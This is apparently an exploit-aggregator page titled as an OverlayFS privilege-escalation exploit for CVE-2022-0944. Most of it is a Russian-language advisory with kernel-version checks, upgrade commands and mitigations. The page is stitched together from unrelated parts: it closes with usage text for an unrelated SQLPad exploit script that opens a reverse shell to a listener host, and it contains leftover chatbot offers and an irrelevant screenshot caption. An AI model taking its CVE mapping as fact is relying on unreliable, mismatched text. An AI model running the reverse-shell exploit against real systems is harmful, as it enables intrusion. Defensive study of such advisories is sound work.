Sploitus

Exploit for OverlayFS-PrivEsc

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN172 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-NEOARTEMIS37-OVERLAYFS-PRIVESC-CVE-2022-0944
# CVE-2022-0944: Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΡ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ Π² OverlayFS πŸ›‘οΈ

![CVE](https://img.shields.io/badge/CVE-2022--0944-critical) ![Severity](https://img.shields.io/badge/Severity-High-red)

Π Π΅ΠΊΠΎΠΌΠ΅Π½Π΄Π°Ρ†ΠΈΠΈ ΠΏΠΎ бСзопасности ΠΈ руководство ΠΏΠΎ ΡΠΌΡΠ³Ρ‡Π΅Π½ΠΈΡŽ послСдствий уязвимости ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΡ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ Π² подсистСмС OverlayFS ядра Linux.

## ΠžΠ±Π·ΠΎΡ€

**CVE-2022-0944** β€” это ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ бСзопасности Π² подсистСмС OverlayFS ядра Linux, которая позволяСт Π»ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹ΠΌ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠ°ΠΌ ΠΏΠΎΠ²Ρ‹ΡˆΠ°Ρ‚ΡŒ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΈ ΠΈΠ·-Π·Π° Π½Π΅ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½ΠΎΠΉ ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚ΠΊΠΈ создания Ρ„Π°ΠΉΠ»ΠΎΠ² Π² ΠΎΠΏΡ€Π΅Π΄Π΅Π»Ρ‘Π½Π½Ρ‹Ρ… конфигурациях.

## ВСхничСскиС Π΄Π΅Ρ‚Π°Π»ΠΈ

![Π‘ΠΊΡ€ΠΈΠ½ΡˆΠΎΡ‚ 2025-03-26 Π² 17-15-46 я ΠΎΠΏΡƒΠ±Π»ΠΈΠΊΠΎΠ²Π°Π» курс ΠΏΠΎ Java для Π½Π°Ρ‡ΠΈΠ½Π°ΡŽΡ‰ΠΈΡ…, ΠΊ соТалСнию Ρƒ мСня Π½Π΅Ρ‚ Ρ„Π°ΠΉΠ»Π° readme для руководства](https://assets.kitploit.com/production/public/readmes/38298/41627c696fdc739e96c3611200d81c9896b1358e9c1b4490dc1921d7ac1deb4e.png)

🚨 ВлияниС

Π›ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹ΠΉ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊ ΠΌΠΎΠΆΠ΅Ρ‚:

root@kitploit:~
    
    
    ΠŸΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ ΠΏΡ€Π°Π²Π° root с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ манипуляций с Ρ„Π°ΠΉΠ»Π°ΠΌΠΈ
    ΠžΠ±ΠΎΠΉΡ‚ΠΈ ограничСния бСзопасности
    Π˜Π·ΠΌΠ΅Π½ΠΈΡ‚ΡŒ критичСски Π²Π°ΠΆΠ½Ρ‹Π΅ систСмныС Ρ„Π°ΠΉΠ»Ρ‹
    ΠŸΠΎΠ»Π½ΠΎΡΡ‚ΡŒΡŽ ΡΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ Ρ†Π΅Π»ΠΎΡΡ‚Π½ΠΎΡΡ‚ΡŒ систСмы
    

πŸ” ΠžΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΈΠ΅

  1. ΠŸΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° вСрсии ядра uname -r



# Π—Π°Ρ‚Ρ€Π°Π³ΠΈΠ²Π°Π΅ΠΌΡ‹Π΅ вСрсии: 5.8 <= ядро < 5.16.12

  2. ΠŸΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° использования OverlayFS mount | grep overlay



# БистСмы, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‰ΠΈΠ΅ ΠΌΠΎΠ½Ρ‚ΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ OverlayFS, находятся ΠΏΠΎΠ΄ ΡƒΠ³Ρ€ΠΎΠ·ΠΎΠΉ

  3. ΠŸΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° Ρ€Π΅ΠΊΠΎΠΌΠ΅Π½Π΄Π°Ρ†ΠΈΠΉ ΠΏΠΎ бСзопасности



# Для Debian/Ubuntu:

root@kitploit:~
    
    
    grep CVE-2022-0944 /var/log/apt/history.log
    
    # Для RHEL/CentOS:
    rpm -q --changelog kernel | grep CVE-2022-0944
    

4\. πŸ›‘οΈ БмягчСниС послСдствий

ΠžΡ„ΠΈΡ†ΠΈΠ°Π»ΡŒΠ½Ρ‹Π΅ исправлСния

ΠžΠ±Π½ΠΎΠ²ΠΈΡ‚Π΅ΡΡŒ Π΄ΠΎ ΠΎΠ΄Π½ΠΎΠΉ ΠΈΠ· этих исправлСнных вСрсий:

root@kitploit:~
    
    
    Π―Π΄Ρ€ΠΎ Linux 5.16.12 ΠΈΠ»ΠΈ Π½ΠΎΠ²Π΅Π΅
    Π‘ΠΏΠ΅Ρ†ΠΈΡ„ΠΈΡ‡Π½Ρ‹Π΅ для Π²Π΅Π½Π΄ΠΎΡ€Π° бэкпортированныС исправлСния
    

Команда обновлСния:

# Ubuntu/Debian

sudo apt update && sudo apt upgrade linux-image-$(uname -r)

# RHEL/CentOS

sudo yum update kernel

ΠžΠ±Ρ…ΠΎΠ΄Π½Ρ‹Π΅ ΠΏΡƒΡ‚ΠΈ (Ссли исправлСниС Π½Π΅Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎ сразу)

root@kitploit:~
    
    
    ΠžΠ³Ρ€Π°Π½ΠΈΡ‡ΠΈΡ‚ΡŒ использованиС OverlayFS:
      sudo modprobe -r overlay
    

Π’Π½Π΅Π΄Ρ€ΠΈΡ‚ΡŒ ограничСния пространств ΠΈΠΌΡ‘Π½:  
# Π‘ΠΎΠ·Π΄Π°Ρ‚ΡŒ Π½Π΅ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠ΅ пространство ΠΈΠΌΡ‘Π½ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ unshare -Ur

root@kitploit:~
    
    
        # Π‘ΠΌΠΎΠ½Ρ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ с ограничСниями ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ
        mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
    

ΠŸΡ€ΠΈΠΌΠ΅Π½ΠΈΡ‚ΡŒ ΠΏΠΎΠ»ΠΈΡ‚ΠΈΠΊΠΈ SELinux/AppArmor: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }

⚠️ ΠžΡ‚ΠΊΠ°Π· ΠΎΡ‚ отвСтствСнности Π­Ρ‚ΠΎΡ‚ Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚ прСдоставлСн ΠΈΡΠΊΠ»ΡŽΡ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ Π² ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΎΠ½Π½Ρ‹Ρ… цСлях. Π₯отя Π±Ρ‹Π»ΠΈ прСдприняты усилия для обСспСчСния точности, гарантия Π½Π΅ прСдоставляСтся. ВсСгда тСстируйтС исправлСния Π² срСдС Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚ΠΊΠΈ ΠΏΠ΅Ρ€Π΅Π΄ Ρ€Π°Π·Π²Ρ‘Ρ€Ρ‚Ρ‹Π²Π°Π½ΠΈΠ΅ΠΌ Π² производствС.

ПослСднСС ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½ΠΈΠ΅: 2023-10-01 | ΠŸΡ€ΠΎΡΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΆΡƒΡ€Π½Π°Π» ΠΈΠ·ΠΌΠ΅Π½Π΅Π½ΠΈΠΉ

ΠšΠ»ΡŽΡ‡Π΅Π²Ρ‹Π΅ особСнности:

  1. Чёткая классификация уязвимости с Π·Π½Π°Ρ‡ΠΊΠ°ΠΌΠΈ бСзопасности
  2. Π’Π°Π±Π»ΠΈΡ†Π° тСхничСских свСдСний для быстрого ознакомлСния
  3. ΠŸΡ€Π°ΠΊΡ‚ΠΈΡ‡Π΅ΡΠΊΠΈΠ΅ шаги ΠΏΠΎ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΈΡŽ ΠΈ ΡΠΌΡΠ³Ρ‡Π΅Π½ΠΈΡŽ
  4. ΠšΠΎΠΌΠ°Π½Π΄Ρ‹ обновлСния для ΠΊΠΎΠ½ΠΊΡ€Π΅Ρ‚Π½Ρ‹Ρ… дистрибутивов
  5. ΠŸΡ€ΠΈΠΌΠ΅Ρ€Ρ‹ ΠΏΠΎΠ»ΠΈΡ‚ΠΈΠΊ бСзопасности (SELinux/AppArmor)
  6. Бсылки Π½Π° ΠΎΡ„ΠΈΡ†ΠΈΠ°Π»ΡŒΠ½Ρ‹Π΅ источники
  7. БоотвСтствиС стандартам раскрытия уязвимостСй



Π­Ρ‚ΠΎΡ‚ Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ README ΠΏΠΎΠ΄Ρ…ΠΎΠ΄ΠΈΡ‚ для:

  * Π“Ρ€ΡƒΠΏΠΏ бСзопасности
  * БистСмных администраторов
  * Π˜Π½ΠΆΠ΅Π½Π΅Ρ€ΠΎΠ² DevOps
  * ΠœΠ΅ΠΉΠ½Ρ‚Π΅ΠΉΠ½Π΅Ρ€ΠΎΠ² ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΎΠ³ΠΎ ПО
  * Π‘Π°Π· Π΄Π°Π½Π½Ρ‹Ρ… уязвимостСй



Π₯ΠΎΡ‚ΠΈΡ‚Π΅, Ρ‡Ρ‚ΠΎΠ±Ρ‹ я:

  1. Π”ΠΎΠ±Π°Π²ΠΈΠ» ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΡŽ ΠΎΠ± исправлСниях для ΠΊΠΎΠ½ΠΊΡ€Π΅Ρ‚Π½ΠΎΠ³ΠΎ Π²Π΅Π½Π΄ΠΎΡ€Π°?
  2. Π’ΠΊΠ»ΡŽΡ‡ΠΈΠ» Π΄Π΅Ρ‚Π°Π»ΠΈ эксплуатации PoC (с ΠΎΡΡ‚ΠΎΡ€ΠΎΠΆΠ½ΠΎΡΡ‚ΡŒΡŽ)?
  3. Π”ΠΎΠ±Π°Π²ΠΈΠ» большС скриптов обнаруТСния?
  4. Настроил ΠΏΠΎΠ΄ ΠΊΠΎΠ½ΠΊΡ€Π΅Ρ‚Π½Ρ‹ΠΉ дистрибутив Linux?



## ИспользованиС

root@kitploit:~
    
    
    usage: main.py [-h] url lhost lport [username] [password]
    
    positional arguments:
      url         URL to SQLPad
      lhost       Listener host address for reverse shell
      lport       Listener port for reverse shell
      username    login username (optional)
      password    login password (optional)
    
    options:
      -h, --help  show this help message and exit
    

**ΠŸΡ€ΠΈΠΌΠ΅Ρ€:**

root@kitploit:~
    
    
    # install requirements
    pip install -r requirements.txt
    
    # start sqlpad docker container
    docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
    
    # trigger exploit
    ./main.py http://localhost:3000 127.0.0.1 1337 admin admin
    

# ΠžΡ‚ΠΊΠ°Π· ΠΎΡ‚ отвСтствСнности

Π­Ρ‚ΠΎΡ‚ Ρ€Π΅ΠΏΠΎΠ·ΠΈΡ‚ΠΎΡ€ΠΈΠΉ содСрТит ΠΊΠΎΠ΄ ΠΈ инструмСнты, ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½Π½Ρ‹Π΅ ΠΈΡΠΊΠ»ΡŽΡ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ для ΠΎΠ±Ρ€Π°Π·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΠ½Ρ‹Ρ… Ρ†Π΅Π»Π΅ΠΉ, Π² частности для использования Π² курсах ΠΏΠΎ кибСрбСзопасности ΠΈ ΡƒΡ‡Π΅Π±Π½Ρ‹Ρ… срСдах. Автор этого ΠΊΠΎΠ΄Π° Π½Π΅ нСсёт отвСтствСнности Π·Π° Π»ΡŽΠ±Ρ‹Π΅ послСдствия, Π²ΠΎΠ·Π½ΠΈΠΊΠ°ΡŽΡ‰ΠΈΠ΅ Π² Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ использования, Π½Π΅ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½ΠΎΠ³ΠΎ использования ΠΈΠ»ΠΈ ΠΌΠΎΠ΄ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ этого ΠΊΠΎΠ΄Π°. Код прСдоставляСтся Β«ΠΊΠ°ΠΊ Π΅ΡΡ‚ΡŒΒ» Π±Π΅Π· ΠΊΠ°ΠΊΠΈΡ…-Π»ΠΈΠ±ΠΎ Π³Π°Ρ€Π°Π½Ρ‚ΠΈΠΉ, явных ΠΈΠ»ΠΈ ΠΏΠΎΠ΄Ρ€Π°Π·ΡƒΠΌΠ΅Π²Π°Π΅ΠΌΡ‹Ρ…, Π²ΠΊΠ»ΡŽΡ‡Π°Ρ, Π½ΠΎ Π½Π΅ ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡ΠΈΠ²Π°ΡΡΡŒ, ΠΏΠΎΠ΄Ρ€Π°Π·ΡƒΠΌΠ΅Π²Π°Π΅ΠΌΡ‹ΠΌΠΈ гарантиями Ρ‚ΠΎΠ²Π°Ρ€Π½ΠΎΠΉ пригодности ΠΈΠ»ΠΈ соотвСтствия ΠΊΠΎΠ½ΠΊΡ€Π΅Ρ‚Π½ΠΎΠΉ Ρ†Π΅Π»ΠΈ.